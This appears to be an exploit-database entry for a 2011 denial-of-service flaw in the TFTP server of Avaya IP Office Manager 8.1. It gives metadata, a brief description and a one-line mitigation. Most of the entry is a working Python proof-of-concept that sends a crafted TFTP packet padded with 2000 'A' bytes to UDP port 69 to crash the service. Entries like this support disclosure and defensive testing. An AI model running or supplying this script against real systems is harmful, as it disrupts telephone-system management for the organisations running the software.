Avaya IP Office Manager TFTP DOS

vendor:

IP Office Manager

by:

Craig Freyman (cd1zz)

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: IP Office Manager

Affected Version From: Avaya IP Office Manager 8.1 (5)

Affected Version To: Avaya IP Office Manager 8.1 (5)

Patch Exists: NO

Related CWE: N/A

CPE: a:avaya:ip_office_manager:8.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2011

Avaya IP Office Manager TFTP DOS

Avaya IP Office Manager is the management console for Avaya IP Office phone systems. There is a built in TFTP server that is used to update the firmware on phones. The TFTP service is loaded when the admin console is opened. An attacker can send a crafted packet with 2000 A characters to the TFTP server, which will cause the server to crash.

Mitigation:

Disable the TFTP service if it is not needed.

Source

Exploit-DB raw data:

#Exploit Title: Avaya IP Office Manager TFTP DOS
#Version: Avaya IP Office Manager 8.1 (5)
#Author: Craig Freyman (cd1zz)
#Date: March 23, 2011
#Description: Avaya IP Office Manager is the management console for Avaya IP Office phone systems. 
#There is a built in TFTP server that is used to update the firmware on phones. The TFTP service 
#is loaded when the admin console is opened. I was not able to overwrite any registers or the SEH.
#Software Link: ftp://ftp.avaya.com/incoming/Up1cku9/SoftwarePub/6_1GA_Builds/ADMIN6_1_5.exe
#Tested on: Windows XP SP3

#!/usr/bin/python
import socket

host = '192.168.133.131'
port = 69

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

crash = "A" * 2000

print "Sending crash...."
pwned = "\x00\x02" + "A" + "\x00" + crash + "\x00"
s.sendto(pwned, (host, port))